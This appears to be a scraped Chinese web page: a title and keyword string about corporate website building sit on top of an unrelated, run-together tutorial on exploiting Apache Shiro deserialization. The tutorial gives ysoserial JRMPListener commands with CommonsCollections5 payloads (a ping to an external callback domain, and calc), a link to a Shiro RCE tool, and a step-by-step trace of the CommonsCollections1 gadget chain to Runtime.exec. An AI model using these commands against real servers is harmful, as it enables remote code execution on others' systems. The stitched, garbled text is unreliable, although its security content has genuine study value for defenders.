企业官网建设流程全解析

聊城公司网站建设,山东网站方案,wordpress 留言板展示,品牌设计包括哪些要素知识点#xff1a; 1、Java攻防-Shiro-有key无利用链JRMP协议 2、Java攻防-Shiro-CC1链分析Transform执行链 一、演示案例-Java攻防-Shiro-有key无利用链JRMP协议 Shrio有key无链#xff1a; JRMP指的是Java远程方法协议#xff08;Java Remote Method Pro…知识点1、Java攻防-Shiro-有key无利用链JRMP协议2、Java攻防-Shiro-CC1链分析Transform执行链一、演示案例-Java攻防-Shiro-有key无利用链JRMP协议Shrio有key无链JRMP指的是Java远程方法协议Java Remote Method Protocol。它是Java对象实现远程通信的基础技术也是Java RMIRemote Method Invocation远程方法调用的底层通信协议。借助JRMP运行于某个Java虚拟机JVM中的对象能够调用另一个JVM中对象的方法就如同调用本地对象的方法一样便捷。非常规链利用工具https://github.com/wyzxxz/shiro_rce_tool文章https://mp.weixin.qq.com/s/MdCUfyaUCAa2M3P3H1NsGw公网靶场-URLDNS链1、ysoserial生成JRMPListenerjava -cp ysoserial-0.0.8-SNAPSHOT-all.jar ysoserial.exploit.JRMPListener6789CommonsCollections5ping kfxmlanpak.zaza.eu.orgshiro_tool使用JRMPClient模式2、java-chains项目生成JRMPListenershiro_tool使用JRMPClient模式本地DEMO-执行RCE1、ysoserial生成JRMPListenerjava -cp ysoserial-0.0.8-SNAPSHOT-all.jar ysoserial.exploit.JRMPListener6789CommonsCollections5calcshiro_tool使用JRMPClient模式2、java-chains项目生成JRMPListenershiro_tool使用JRMPClient模式二、演示案例-Java攻防-Shiro-CC1链分析Transform执行链文章参考https://mp.weixin.qq.com/s/J_YeNkLN6KYTCVDYFh1dvQcommons-collections Gadget chain: ObjectInputStream.readObject()AnnotationInvocationHandler.readObject())MapEntry#setValueTransformedMap#checkSetValueChainedTransformer.transform()ConstantTransformer.transform()Runtime.class InvokerTransformer.transform()getRuntime().exec(calc);Class.getMethod()Runtime.getRuntime()Runtime.exec()//跟链过程从下往上源码全局搜索InvokerTransformer.transform()1、寻找sink执行点作用执行点触发RCE执行InvokerTransformer#transform()本地DEMOChainedTransformer#transform()ConstantTransformer#transform()2、寻找gadget调用链作用调用链实现承上启下TransformedMap#checkSetValue现在已经知道RCE的由来现在只需要看谁用了transform()MapEntry#setValue3、寻找Source入口点作用入口点重写方法调用AnnotationInvocationHandler#readObject()#setValueObjectInputStream#readObject()